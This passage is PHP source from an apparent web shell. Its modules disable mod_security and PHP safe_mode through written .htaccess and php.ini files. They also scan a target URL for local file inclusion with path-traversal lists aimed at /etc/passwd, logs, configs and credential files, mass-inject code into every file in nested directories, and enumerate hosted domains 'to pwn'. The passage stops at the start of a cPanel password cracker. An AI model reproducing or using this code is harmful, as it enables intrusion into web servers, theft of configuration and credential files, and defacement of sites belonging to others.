  1821. echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
  1822. if(!empty($_POST['p2']) && isset($_POST['p2']))
  1823. {
  1824. $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  1825. fwrite($fil,'<IfModule mod_security.c>
  1826. Sec------Engine Off
  1827. Sec------ScanPOST Off
  1828. </IfModule>');
  1829. fclose($fil);
  1830. }
  1831. if(!empty($_POST['p1'])&& isset($_POST['p1']))
  1832. {
  1833. $fil=fopen($GLOBALS['cwd']."php.ini","w");
  1834. fwrite($fil,'safe_mode=OFF
  1835. disable_functions=NONE');
  1836. fclose($fil);
  1837. }
  1838. if(!empty($_POST['p3']) && isset($_POST['p3']))
  1839. {
  1840. $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  1841. fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
  1842. AddType application/x-httpd-cgi .sh
  1843. AddHandler cgi-script .pl
  1844. AddHandler cgi-script .pl');
  1845. fclose($fil);
  1846. }
  1847. echo "<br><br /><br /></div>";
  1848. echo '</div>';
  1849. printFooter();
  1850. }
  1851. function actionlfiscan() {
  1852. printHeader();
  1853. print '
  1854. <h3>LFI File Scanner & Dumper</h3>
  1855.  
  1856. <form method="post" action="?"><input type="hidden" name="a" value="lfiscan">
  1857. LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype">
  1858. <option value="1">
  1859. Access Log
  1860. </option>
  1861.  
  1862. <option value="2">
  1863. httpd.conf
  1864. </option>
  1865.  
  1866. <option value="3">
  1867. Error Log
  1868. </option>
  1869. <option value="4">
  1870. php.ini
  1871. </option>
  1872. <option value="5">
  1873. MySQL
  1874. </option>
  1875. <option value="6">
  1876. FTP
  1877. </option>
  1878. <option value="7">
  1879. Environ
  1880. </option>
  1881. </select> Null: <select name="null">
  1882. <option value="%00">
  1883. Yes
  1884. </option>
  1885.  
  1886. <option value="">
  1887. No
  1888. </option>
  1889. </select> User-Agent: <input type="text" size="20" name="custom_header" value="">
  1890. </form>';
  1891. error_reporting(0);
  1892. if($_POST['lfiurl']) {
  1893. print "<pre>";
  1894. $cheader = $_POST['custom_header'];
  1895. $target = $_POST['lfiurl'];
  1896. $type = $_POST['scantype'];
  1897. $byte1 = $_POST['null'];
  1898. $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";
  1899. $lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1."";
  1900. $lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1."";
  1901. $lfiaccess = array(
  1902. 1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",
  1903. 2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",
  1904. 3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",
  1905. 4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",
  1906. 5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",
  1907. 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",
  1908. 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",
  1909. 8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",
  1910. 9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",
  1911. 10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",
  1912. 11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",
  1913. 12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."",
  1914. 13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."",
  1915. 14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",
  1916. 15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",
  1917. 16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."",
  1918. 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",
  1919. 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",
  1920. 19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",
  1921. 20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",
  1922. 21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",
  1923. 22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",
  1924. 23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");
  1925.  
  1926. $lfierror = array(
  1927. 1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",
  1928. 2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",
  1929. 3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",
  1930. 4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",
  1931. 5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",
  1932. 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",
  1933. 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",
  1934. 8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",
  1935. 9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",
  1936. 10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",
  1937. 11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",
  1938. 12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."",
  1939. 13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."",
  1940. 14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",
  1941. 15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",
  1942. 16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."",
  1943. 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",
  1944. 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",
  1945. 19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",
  1946. 20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",
  1947. 21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",
  1948. 22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",
  1949. 23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");
  1950.  
  1951. $lficonfig = array(
  1952. 1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",
  1953. 2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",
  1954. 3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",
  1955. 4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",
  1956. 5 => "../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."",
  1957. 6 => "../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."",
  1958. 7 => "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."",
  1959. 8 => "../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."",
  1960. 9 => "../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."",
  1961. 10 => "../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."",
  1962. 11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."",
  1963. 12 => "../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."",
  1964. 13 => "../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."",
  1965. 14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."",
  1966. 15 => "../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."",
  1967. 16 => "../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."",
  1968. 17 => "../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."",
  1969. 18 => "../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."",
  1970. 19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."",
  1971. 20 => "../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."",
  1972. 21 => "../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."",
  1973. 22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."",
  1974. 23 => "../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."",
  1975. 24 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."",
  1976. 25 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."",
  1977. 26 => "../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."",
  1978. 27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."",
  1979. 28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."",
  1980. 29 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."",
  1981. 30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."",
  1982. 31 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."",
  1983. 32 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."",
  1984. 33 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."",
  1985. 34 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."",
  1986. 35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");
  1987.  
  1988. $lfiphpini = array(
  1989. 1 => "../../../../../../../../../../../../../../../etc/php.ini".$byte1."",
  1990. 2 => "../../../../../../../../../../../../../../../bin/php.ini".$byte1."",
  1991. 3 => "../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."",
  1992. 4 => "../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."",
  1993. 5 => "../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."",
  1994. 6 => "../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."",
  1995. 7 => "../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."",
  1996. 8 => "../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."",
  1997. 9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."",
  1998. 10 => "../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."",
  1999. 11 => "../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."",
  2000. 12 => "../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."",
  2001. 13 => "../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."",
  2002. 14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."",
  2003. 15 => "../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."",
  2004. 16 => "../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."",
  2005. 17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."",
  2006. 18 => "../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."",
  2007. 19 => "../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."",
  2008. 20 => "../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."",
  2009. 21 => "../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."",
  2010. 22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."",
  2011. 23 => "../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."",
  2012. 24 => "../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."",
  2013. 25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."",
  2014. 26 => "../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."",
  2015. 27 => "../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1."");
  2016.  
  2017. $lfimysql = array(
  2018. 1 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."",
  2019. 2 => "../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."",
  2020. 3 => "../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."",
  2021. 4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."",
  2022. 5 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."",
  2023. 6 => "../../../../../../../../../../../../../../../var/mysql.log".$byte1."",
  2024. 7 => "../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."",
  2025. 8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."",
  2026. 9 => "../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."",
  2027. 10 => "../../../../../../../../../../../../../../../etc/my.cnf".$byte1."");
  2028.  
  2029. $lfiftp = array(
  2030. 1 => "../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."",
  2031. 2 => "../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."",
  2032. 3 => "../../../../../../../../../../../../../../../var/log/proftpd".$byte1."",
  2033. 4 => "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."",
  2034. 5 => "../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."",
  2035. 6 => "../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."",
  2036. 7 => "../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."",
  2037. 8 => "../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."",
  2038. 9 => "../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."",
  2039. 10 => "../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."",
  2040. 11 => "../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."",
  2041. 12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."",
  2042. 13 => "../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."",
  2043. 14 => "../../../../../../../../../../../../../../../var/log/xferlog".$byte1."",
  2044. 15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."",
  2045. 16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."",
  2046. 17 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."",
  2047. 18 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."",
  2048. 19 => "../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."",
  2049. 20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."",
  2050. 21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."",
  2051. 22 => "../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."",
  2052. 23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."",
  2053. 24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."",
  2054. 25 => "../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."",
  2055. 26 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."",
  2056. 27 => "../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."",
  2057. 28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."",
  2058. 29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."",
  2059. 30 => "../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."",
  2060. 31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."",
  2061. 32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."",
  2062. 33 => "../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."",
  2063. 34 => "../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."",
  2064. 35 => "../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."",
  2065. 36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."",
  2066. 37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."",
  2067. 38 => "../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."",
  2068. 39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."",
  2069. 40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."",
  2070. 41 => "../../../../../../../../../../../../../../../var/log/ftplog".$byte1."",
  2071. 42 => "../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."",
  2072. 43 => "../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."",
  2073. 44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");
  2074.  
  2075.  
  2076. $x = 1;
  2077. if ( $type == 1 ) {
  2078. $res1 = FetchURL($target.$lfitest);
  2079. $res2 = FetchURL($target.$lfitest2);
  2080. $rhash1 = md5($res1);
  2081. $rhash2 = md5($res2);
  2082. if ($rhash1 != $rhash2) {
  2083. print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
  2084. while($lfiaccess[$x]) {
  2085. $res3 = FetchURL($target.$lfiaccess[$x]);
  2086. $rhash3 = md5($res3);
  2087. if ($rhash3 != $rhash2) {
  2088. print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiaccess[$x]."\">".$target."".$lfiaccess[$x]."</a><br />";
  2089. }
  2090. else {
  2091. print "<font color='red'>[!] Failed!</font>".$target."".$lfiaccess[$x]."<br />";
  2092. }
  2093. $x++;
  2094. }
  2095. }
  2096. }
  2097. if ( $type == 2 ) {
  2098. $res1 = FetchURL($target.$lfitest);
  2099. $res2 = FetchURL($target.$lfitest2);
  2100. $rhash1 = md5($res1);
  2101. $rhash2 = md5($res2);
  2102. if ($rhash1 != $rhash2) {
  2103. print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
  2104. while($lficonfig[$x]) {
  2105. $res3 = FetchURL($target.$lficonfig[$x]);
  2106. $rhash3 = md5($res3);
  2107. if ($rhash3 != $rhash2) {
  2108. print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lficonfig[$x]."\">".$target."".$lficonfig[$x]."</a><br />";
  2109. }
  2110. else {
  2111. print "<font color='red'>[!] Failed!</font>".$target."".$lficonfig[$x]."<br />";
  2112. }
  2113. $x++;
  2114. }
  2115. }
  2116. }
  2117. if ( $type == 3 ) {
  2118. $res1 = FetchURL($target.$lfitest);
  2119. $res2 = FetchURL($target.$lfitest2);
  2120. $rhash1 = md5($res1);
  2121. $rhash2 = md5($res2);
  2122. if ($rhash1 != $rhash2) {
  2123. print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
  2124. while($lfierror[$x]) {
  2125. $res3 = FetchURL($target.$lfierror[$x]);
  2126. $rhash3 = md5($res3);
  2127. if ($rhash3 != $rhash2) {
  2128. print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfierror[$x]."\">".$target."".$lfierror[$x]."</a><br />";
  2129. }
  2130. else {
  2131. print "<font color='red'>[!] Failed!</font>".$target."".$lfierror[$x]."<br />";
  2132. }
  2133. $x++;
  2134. }
  2135. }
  2136. }
  2137. if ( $type == 4 ) {
  2138. $res1 = FetchURL($target.$lfitest);
  2139. $res2 = FetchURL($target.$lfitest2);
  2140. $rhash1 = md5($res1);
  2141. $rhash2 = md5($res2);
  2142. if ($rhash1 != $rhash2) {
  2143. print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
  2144. while($lfiphpini[$x]) {
  2145. $res3 = FetchURL($target.$lfiphpini[$x]);
  2146. $rhash3 = md5($res3);
  2147. if ($rhash3 != $rhash2) {
  2148. print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiphpini[$x]."\">".$target."".$lfiphpini[$x]."</a><br />";
  2149. }
  2150. else {
  2151. print "<font color='red'>[!] Failed!</font>".$target."".$lfiphpini[$x]."<br />";
  2152. }
  2153. $x++;
  2154. }
  2155. }
  2156. }
  2157. if ( $type == 5 ) {
  2158. $res1 = FetchURL($target.$lfitest);
  2159. $res2 = FetchURL($target.$lfitest2);
  2160. $rhash1 = md5($res1);
  2161. $rhash2 = md5($res2);
  2162. if ($rhash1 != $rhash2) {
  2163. print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
  2164. while($lfimysql[$x]) {
  2165. $res3 = FetchURL($target.$lfimysql[$x]);
  2166. $rhash3 = md5($res3);
  2167. if ($rhash3 != $rhash2) {
  2168. print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfimysql[$x]."\">".$target."".$lfimysql[$x]."</a><br />";
  2169. }
  2170. else {
  2171. print "<font color='red'>[!] Failed!</font>".$target."".$lfimysql[$x]."<br />";
  2172. }
  2173. $x++;
  2174. }
  2175. }
  2176. }
  2177. if ( $type == 6 ) {
  2178. $res1 = FetchURL($target.$lfitest);
  2179. $res2 = FetchURL($target.$lfitest2);
  2180. $rhash1 = md5($res1);
  2181. $rhash2 = md5($res2);
  2182. if ($rhash1 != $rhash2) {
  2183. print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
  2184. while($lfiftp[$x]) {
  2185. $res3 = FetchURL($target.$lfiftp[$x]);
  2186. $rhash3 = md5($res3);
  2187. if ($rhash3 != $rhash2) {
  2188. print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiftp[$x]."\">".$target."".$lfiftp[$x]."</a><br />";
  2189. }
  2190. else {
  2191. print "<font color='red'>[!] Failed!</font>".$target."".$lfiftp[$x]."<br />";
  2192. }
  2193. $x++;
  2194. }
  2195. }
  2196. }
  2197. if ( $type == 7 ) {
  2198. $res1 = FetchURL($target.$lfitest);
  2199. $res2 = FetchURL($target.$lfitest2);
  2200. $rhash1 = md5($res1);
  2201. $rhash2 = md5($res2);
  2202. if ($rhash1 != $rhash2) {
  2203. print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";{
  2204. $res3 = FetchURL($target.$lfiprocenv);
  2205. $rhash3 = md5($res3);
  2206. if ($rhash3 != $rhash2) {
  2207. print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiprocenv."\">".$target."".$lfiprocenv."</a><br />";
  2208. }
  2209. else {
  2210. print "<font color='red'>[!] Failed!</font>".$target."".$lfiprocenv."<br />";
  2211. }
  2212. }
  2213. }
  2214. }
  2215. }
  2216. printFooter();
  2217. }
  2218. function actionInjector(){
  2219. printHeader();
  2220. echo '<h1>Mass Code Injector</h1>';
  2221. echo '<div class="content">';
  2222.  
  2223. if(stristr(php_uname(),"Windows")) { $DS = "\\"; } else if(stristr(php_uname(),"Linux")) { $DS = '/'; }
  2224. function get_structure($path,$depth) {
  2225. global $DS;
  2226. $res = array();
  2227. if(in_array(0, $depth)) { $res[] = $path; }
  2228. if(in_array(1, $depth) or in_array(2, $depth) or in_array(3, $depth)) {
  2229. $tmp1 = glob($path.$DS.'*',GLOB_ONLYDIR);
  2230. if(in_array(1, $depth)) { $res = array_merge($res,$tmp1); }
  2231. }
  2232. if(in_array(2, $depth) or in_array(3, $depth)) {
  2233. $tmp2 = array();
  2234. foreach($tmp1 as $t){
  2235. $tp2 = glob($t.$DS.'*',GLOB_ONLYDIR);
  2236. $tmp2 = array_merge($tmp2, $tp2);
  2237. }
  2238. if(in_array(2, $depth)) { $res = array_merge($res,$tmp2); }
  2239. }
  2240. if(in_array(3, $depth)) {
  2241. $tmp3 = array();
  2242. foreach($tmp2 as $t){
  2243. $tp3 = glob($t.$DS.'*',GLOB_ONLYDIR);
  2244. $tmp3 = array_merge($tmp3, $tp3);
  2245. }
  2246. $res = array_merge($res,$tmp3);
  2247. }
  2248. return $res;
  2249. }
  2250.  
  2251. if(isset($_POST['submit']) && $_POST['submit']=='Inject') {
  2252. $name = $_POST['name'] ? $_POST['name'] : '*';
  2253. $type = $_POST['type'] ? $_POST['type'] : 'html';
  2254. $path = $_POST['path'] ? $_POST['path'] : getcwd();
  2255. $code = $_POST['code'] ? $_POST['code'] : 'Team MaDLeeTs - AnOnGuY';
  2256. $mode = $_POST['mode'] ? $_POST['mode'] : 'a';
  2257. $depth = sizeof($_POST['depth']) ? $_POST['depth'] : array('0');
  2258. $dt = get_structure($path,$depth);
  2259. foreach ($dt as $d) {
  2260. if($mode == 'a') {
  2261. if(file_put_contents($d.$DS.$name.'.'.$type, $code, FILE_APPEND)) {
  2262. echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:lime;"> was injected</span></div>';
  2263. } else {
  2264. echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
  2265. }
  2266. } else {
  2267. if(file_put_contents($d.$DS.$name.'.'.$type, $code)) {
  2268. echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:lime;"> was injected</span></div>';
  2269. } else {
  2270. echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
  2271. }
  2272. }
  2273. }
  2274. } else {
  2275. echo '<form method="post" action="">
  2276. <table align="center">
  2277. <tr>
  2278. <td>Directory : </td>
  2279. <td><input class="box" name="path" value="'.getcwd().'" size="50"/></td>
  2280. </tr>
  2281. <tr>
  2282. <td class="title">Mode : </td>
  2283. <td>
  2284. <select style="width: 100px;" name="mode" class="box">
  2285. <option value="a">Apender</option>
  2286. <option value="w">Overwriter</option>
  2287. </select>
  2288. </td>
  2289. </tr>
  2290. <tr>
  2291. <td class="title">File Name & Type : </td>
  2292. <td>
  2293. <input type="text" style="width: 100px;" name="name" value="*"/>&nbsp;&nbsp;
  2294. <select style="width: 100px;" name="type" class="box">
  2295. <option value="html">HTML</option>
  2296. <option value="htm">HTM</option>
  2297. <option value="php" selected="selected">PHP</option>
  2298. <option value="asp">ASP</option>
  2299. <option value="aspx">ASPX</option>
  2300. <option value="xml">XML</option>
  2301. <option value="txt">TXT</option>
  2302. </select></td>
  2303. </tr>
  2304. <tr>
  2305. <td class="title">Code Inject Depth : </td>
  2306. <td>
  2307. <input type="checkbox" name="depth[]" value="0" checked="checked"/>&nbsp;0&nbsp;&nbsp;
  2308. <input type="checkbox" name="depth[]" value="1"/>&nbsp;1&nbsp;&nbsp;
  2309. <input type="checkbox" name="depth[]" value="2"/>&nbsp;2&nbsp;&nbsp;
  2310. <input type="checkbox" name="depth[]" value="3"/>&nbsp;3
  2311. </td>
  2312. </tr>
  2313. <tr>
  2314. <td colspan="2"><textarea name="code" cols="70" rows="10" class="box"></textarea></td>
  2315. </tr>
  2316. <tr>
  2317. <td colspan="2" style="text-align: center;">
  2318. <input type="hidden" name="a" value="Injector">
  2319. <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  2320. <input type="hidden" name="p1">
  2321. <input type="hidden" name="p2">
  2322. <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  2323. <input style="padding :5px; width:100px;" name="submit" type="submit" value="Inject"/></td>
  2324. </tr>
  2325. </table>
  2326. </form>';
  2327. }
  2328. echo '</div>';
  2329. printFooter();
  2330. }
  2331. function actionDomain() {
  2332. printHeader();
  2333. echo '<h1>Local Domains</h1><div class=content>';
  2334. $file = @implode(@file("/etc/named.conf"));
  2335. if (!$file) {
  2336. die("# Can't Read [/etc/named.conf] ... Sorry ! :( ");
  2337. }
  2338. preg_match_all("#named/(.*?).db#", $file, $r);
  2339. $domains = array_unique($r[1]);
  2340. //check();
  2341. //if(isset($_GET['ShowAll']))
  2342. {
  2343. echo "<table align=center border=1 width=59% cellpadding=5>
  2344. <tr><td colspan=2>[#] There are : [ <b>" . count($domains) . "</b> ] Domain(s) on this box ... * I Suggest That You Should Pwn it ;) :D*</td></tr>
  2345. <tr><td>Domain</td><td>User</td></tr>";
  2346. foreach ($domains as $domain) {
  2347. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
  2348. echo "<tr><td>$domain</td><td>" . $user['name'] . "</td></tr>";
  2349. }
  2350. echo "</table>";
  2351. }
  2352. echo '</div>';
  2353. printFooter();
  2354. }
  2355.  
  2356. function actionCpanel() {
  2357. printHeader();
  2358. echo '<h1>cPanel Cracker</h1>';
  2359. echo '<div class="content">';
  2360. echo '<table align=center class="main" border="0"><tr bgcolor="#5e5e5e"><td>Users</td><td></td><td>Selected Users</td><td>Password</td></tr>';
  2361. echo '<tr><td><textarea rows="20" name="S1" cols="33"></textarea></td>';
  2362. echo '<td><input type="button" name="cpad1" value=">" class="cpb"/><br /><br /><input type="button" name="cpadall" value=">>" class="cpb"/><br /><br />';
